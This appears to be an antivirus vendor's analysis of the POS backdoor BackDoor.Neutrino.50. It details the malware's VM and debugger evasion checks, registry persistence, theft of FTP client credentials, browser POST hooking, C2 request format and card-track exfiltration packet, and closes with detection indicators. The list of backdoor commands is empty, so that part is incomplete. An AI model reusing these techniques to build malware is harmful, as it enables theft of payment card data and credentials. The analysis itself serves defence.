BackDoor.Neutrino.50

A multicomponent backdoor that can infect POS terminals. It can exploit the CVE-2012-0158 vulnerability to spread.

Once launched, the backdoor checks its environment for the presence of virtual machines as follows:

1. Using API IsDebuggerPresent, checks for the presence of a debugger
2. Using API CheckRemoteDebuggerPresent, checks for the presence of a debugger
3. Checks whether the user name is similar to any of the following ones:
   • MALTEST
   • TEQUILABOOMBOOM
   • SANDBOX
   • VIRUS
   • MALWARE
4. Converts the file name to lowercase and checks whether it is similar to any of the following ones:
   • SAMPLE
   • VIRUS
   • SANDBOX
5. Checks for export of "wine_get_unix_file_name" to kernel32.dll
6. Checks availability of "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools"
7. Compares the value of the "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier" switch with "VMWARE", "VBOX", "QEMU"
8. Compares the value of the "HKLM\\HARDWARE\\Description\\System\\SystemBiosVersion" switch with "VBOX", "QEMU", "BOCHS"
9. Checks availability of "HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions"
10. Compares the value of the "HKLM\\HARDWARE\\Description\\System\\VideoBiosVersion" switch with "VIRTUALBOX"

If a virtual machine is detected, the Trojan displays the following error message: “An unknown error occurred. Error - (0x[random number])”. After that, BackDoor.Neutrino.50 initiates a self-removal process.

While the Trojan is installed, it creates the "%AppData%\\W2VTWFFiQQ" directory replicating itself there and modifies "Software\\Microsoft\\Windows\\CurrentVersion\\Run" to ensure its autorun. The branch (HKLM/HKCU) is chosen based on the availability of administrator privileges.

As a parameter name, the Trojan chooses a file from the %windir% directory matching one of the following masks:

install*.exe
setup*.exe
update*.exe
patch*.exe

If there is no matching file, the Trojan uses the "svchost.exe" name.

The malware copies the creation date of "explorer.exe" and assigns the file with the “hidden” and “system” attributes.

Then the Trojan initiates a separate thread that monitors the status of the switch responsible for autorun. If the switch is modified or missing, the Trojan adds it again.

Once launched successfully, the backdoor starts gathering information on the infected system, in particular, GUID values ("HKLM\\Software\\Microsoft\\Cryptography\\MachineGuid"), OS version, architecture type, anti-virus software type and version.

Moreover, the Trojan can remove some malicious programs found in the system. For that, it checks all executable files in %APPDATA%, %TEMP%, and %ALLUSERSPROFILE% using the WinVerifyTrust function. If verification returns negative results, and a relevant process is found, the backdoor removes it from autorun modifying "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; at that, the branch (HKLM/HKCU) is chosen based on the availability of administrator privileges. After that, the malicious program deletes the file.

Simultaneously, the backdoor counts the number of removed viruses and forwards this data to the command and control server.

Aside from being able to operate on POS terminals, this Trojan can steal information stored by the Microsoft Mail client and account details used to get access to resources from a number of well-known FTP clients over the FTP protocol:

filezilla.exe
ftprush.exe
winscp.exe
coreftp.exe
freeftp.exe
far.exe
ftpte.exe
smartftp.exe
flashfxp.exe
totalcmd.exe

Among running processes, the Trojan looks for the following browser processes:

firefox.exe
chrome.exe
iexplore.exe
opera.exe

intercepting data sending functions (PR_Write, send, WSASend, HttpSendRequestW, and InternetWriteFile). The malware sends the command and control server data from POST requests containing the "ocsp" or "application/ocsp-request" substrings. For Internet Explorer, data from all POST requests is sent.

The "rate" switch of the "HKCU\\Software\\N3NNetwork\\" branch contains the data on time interval between requests sent to the server. The backdoor reads this value and multiplies it by 60 seconds. The result cannot exceed 1 hour.

Data is sent as a "cmd=1&uid=%s&os=%s&av=%s&version=%s&quality=%i" string, where uid indicates the infected computer GUID, os indicates data on the OS, av indicates the installed anti-virus, version is the version of the backdoor, quality stands for the number of detected viruses.

The command and control server list is hard-coded in the Trojan's body. It is implemented as a UNICODE string encrypted with base64. The string can contain several server addresses separated by '*'. During initialization, the backdoor checks all the servers until it finds one that replies to a PING request.

Server reply to a PING request can look as follows:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>
The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>
<!-- DEBUGcG9uZw==DEBUG -->

From the reply, the backdoor retrieves the payload contained between the "DEBUG" and "DEBUG" strings encrypted with base64.

The Trojan extracts the command and control server address from the registry, decrypts it, and generates a request as follows:

"POST <!target> HTTP/1.0\r\n"
                    "Host: \r\n"
                    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0\r\n"
                    "Content-type: application/x-www-form-urlencoded\r\n"
                    "Cookie: authkeys=21232f297a57a5a743894a0e4a801fc3\r\n"
                    "Content-length: <!len>\r\n"
                    "\r\n"
                    "<!payload>\n",

where the target and host values are retrieved from the address of the server to which data should be forwarded, len indicates the payload length, payload indicates the string encrypted with base64.

Bank card information is sent in the following package:

d=1&type=%s&data=%s

where type indicates the "Track1" or "Track2" strings and data indicates the information extracted from the process memory.

The backdoor can execute the following commands:

The backdoor can be detected in the system as follows:

Mutex—"W2VTWFFiQQ"
Directory—"%AppData%\\W2VTWFFiQQ"
Presence of the "HKCU\\Software\\N3NNetwork\\" branch